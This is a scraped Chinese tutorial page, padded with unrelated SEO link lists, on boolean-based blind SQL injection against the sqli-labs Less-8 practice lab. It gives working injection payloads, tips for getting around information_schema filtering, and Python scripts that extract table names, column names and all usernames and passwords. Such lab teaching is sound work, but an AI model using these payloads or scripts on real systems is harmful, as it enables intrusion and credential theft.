当前位置: 首页 > news >正文

网站域名列表商丘建网站

网站域名列表,商丘建网站,公司logo设计费用一般多少钱,深圳网站设计公司wx成都柚米科技15目录 1 布尔盲注 2布尔盲注流程 2.1输入id进行测试 2.2判断注入类型 2.3爆数据库名 2.4爆表名 2.5爆字段名 2.6查询数据 1 布尔盲注 布尔盲注就是在SQL注入过程中#xff0c;SQL语句执行后#xff0c;查询到的数据不能回显到前端页面#xff0c;如果正确执行了构造的…目录 1 布尔盲注 2布尔盲注流程 2.1输入id进行测试 2.2判断注入类型 2.3爆数据库名 2.4爆表名 2.5爆字段名 2.6查询数据 1 布尔盲注 布尔盲注就是在SQL注入过程中SQL语句执行后查询到的数据不能回显到前端页面如果正确执行了构造的SQL语句则返回一种页面如果错误则执行另一种页面。基于两种页面来判断SQL语句正确与否达到获取数据的目的。 2布尔盲注流程 2.1输入id进行测试 输入?id1发现页面回显You are in.......... 输入?id1发现页面无显示 此时联想到正确错误两个页面采用布尔盲注 2.2判断注入类型 1.?id1 and 11 和?id1 and 12进行测试如果11页面显示正常和原页面一样并且12页面报错或者页面部分数据显示不正常那么可以确定此处为数字型注入。 2.?id1 and 11--和?id1 and 12--进行测试如果11页面显示正常和原页面一样并且12页面报错或者页面部分数据显示不正常那么可以确定此处为字符型注入。 根据结果可判断为字符型注入 2.3爆数据库名 如何获取数据库呢可以通过截取字符串的方式进行获取。substr(string, start, length) 截取字符串这个函数的意思简单来说截取一个字符串从start位可以是第1位第2位。。。。每次截取length个字符。然后使用ascii()函数。其作用是将字符转换成对应的ascii值。 ?id1 and ascii(substr(database(),1,1))97-- 如果数据库名的第一个字符的ascii码值等于97则页面显示正确的页面如果数据库名的第一个字符的ascii码值不等于97则页面显示错误的页面 页面无显示说明数据库名的第一个字符的ascii码值不等于97 我们可以编写一个简单的python脚本就可以爆破出数据库名 import timeimport requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef inject_database(url):name for i in range(1, 20):for j in range(32, 129):payload 1 and ascii(substr(database(), %d, 1)) %d-- % (i, j)res {id: payload}r requests.get(url, paramsres)if You are in........... in r.text:name name chr(j)print(name)breakelse:continueinject_database(url) 根据运行结果得出数据库名为security  2.4爆表名 使用count() 函数进行获取表的数量 1 and (select count(table_name) from information_schema.tables where table_schemasecurity)2-- 1 and (select count(table_name) from information_schema.tables where table_schemasecurity)4-- 可以看出security下有四张表,然后进行爆表名 1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasecurity),1,1))101-- mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库他保存着mysql 服务器所维护的所有其他的数据库信息 包括了 库名表名列名。 在注入时information_schema库的作用就是获取 table_schema table_name, column_name . 这些数据库内的信息。如果information_schema库被过滤掉还可以尝试使用下述库来代替 sys.schema_auto_increment_columns  sys.schema_table_statistics_with_buffer mysql.innodb_table_stats mysql.innodb_table_index 然后编写一个简单的python脚本就可以爆破出所有的表名 import requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef boolean_blind_inject(url):name for i in range(1, 50):low 32high 128while low high:mid (low high) // 2# 构造布尔盲注的payloadpayload 1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasecurity),%d,1)) %d-- %(i, mid)params {id: payload} # 使用 params 而不是 data# 发送 GET 请求r requests.get(url, paramsparams)# 根据页面内容或状态码判断是否注入成功if You are in........... in r.text:low mid 1else:high midmid (low high) // 2if mid 32: # 如果 mid 为 32则表示已经到达字符串的末尾breakname chr(mid)print(name)# 调用函数 boolean_blind_inject(url)上述代码采用二分法提高效率  根据运行结果得出表名为emails,referers,uagents,users 2.5爆字段名 根据表名知道可能用户的账户和密码是在users表中接下来我们就是得到该表下的字段名以及内容。 同样使用python脚本来爆破出字段名只需将刚才的python脚本中的payload变换一下 import requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef boolean_blind_inject(url):name for i in range(1, 50):low 32high 128while low high:mid (low high) // 2# 构造布尔盲注的payloadpayload 1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers),%d,1)) %d-- %(i, mid)params {id: payload} # 使用 params 而不是 data# 发送 GET 请求r requests.get(url, paramsparams)# 根据页面内容或状态码判断是否注入成功if You are in........... in r.text:low mid 1else:high midmid (low high) // 2if mid 32: # 如果 mid 为 32则表示已经到达字符串的末尾breakname chr(mid)print(name)# 调用函数 boolean_blind_inject(url)根据运行结果得出字段名为idusername,password 2.6查询数据 import requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef boolean_blind_inject(url):name for i in range(1, 200):low 32high 128while low high:mid (low high) // 2# 构造布尔盲注的payloadpayload 1 and ascii(substr((select group_concat(username,id,password) from users),%d,1)) %d-- %(i, mid)params {id: payload} # 使用 params 而不是 data# 发送 GET 请求r requests.get(url, paramsparams)# 根据页面内容或状态码判断是否注入成功if You are in........... in r.text:low mid 1else:high midmid (low high) // 2if mid 32: # 如果 mid 为 32则表示已经到达字符串的末尾breakname chr(mid)print(name)# 调用函数 boolean_blind_inject(url)这样我们就爆出各个用户的账号密码了本次手布尔盲注到此结束如果不会写python脚本也可以使用BurpSuite工具来破解数据感兴趣的同学可以自行搜索相关资料学习。
http://www.w-s-a.com/news/975370/

相关文章:

  • 网站和小程序的区别请问做网站怎么赚钱
  • 网站logo设计免费版在线网站开发建设准备工作
  • wordpress多站点 主题南京做网站好的公司
  • 广州 门户seo到底是做什么的
  • 可以登录国外网站吗如何用家用电脑做网站
  • 吉安建站公司wordpress企业
  • 河北住房和城乡建设厅网站6thinkphp做视频网站
  • 遵义网站制作一般需要多少钱深圳全国网站制作哪个好
  • 公众平台网站价格哪个网站做餐饮推广最好
  • 深圳 公司网站设计重庆的网站设计公司价格
  • 网站开发市场分析餐饮平台app有哪些
  • 制作一个收费网站要多少钱开发网站需要什么技术
  • 网站流量统计平台二手域名做网站不收录
  • 蒙古网站后缀mysql8.0 wordpress
  • 免费建立一个网站互联网推广培训
  • WordPress多站点绑定域名深圳住房建设部官方网站
  • 网站建设公司zgkr上海网页网络技术有限公司
  • wordpress附件扩展格式徐州seo关键词
  • wordpress博客站模板织梦网站 联系方式修改
  • 北京城乡建设厅网站重庆网站建设解决方案
  • 网站建设和维护工作内容网站的空间与域名
  • 济南做门户网站开发公司网页发布的步骤
  • 江苏省交通厅门户网站建设管理办法做的网站怎么让百度收录
  • 关于怎么做网站网站site的收录数量要多远索引量
  • 传世网站建设阳光创信-网站建设首选品牌
  • 周口建设网站中国装修公司十大排名
  • wordpress自助发卡青浦网站优化
  • 南京建设银行公积金查询网站wordpress加载插件下载
  • 做网站怎么那么难网站的建设与管理的心得体会
  • 黄冈网站建设哪家快些网站规划与建设评分标准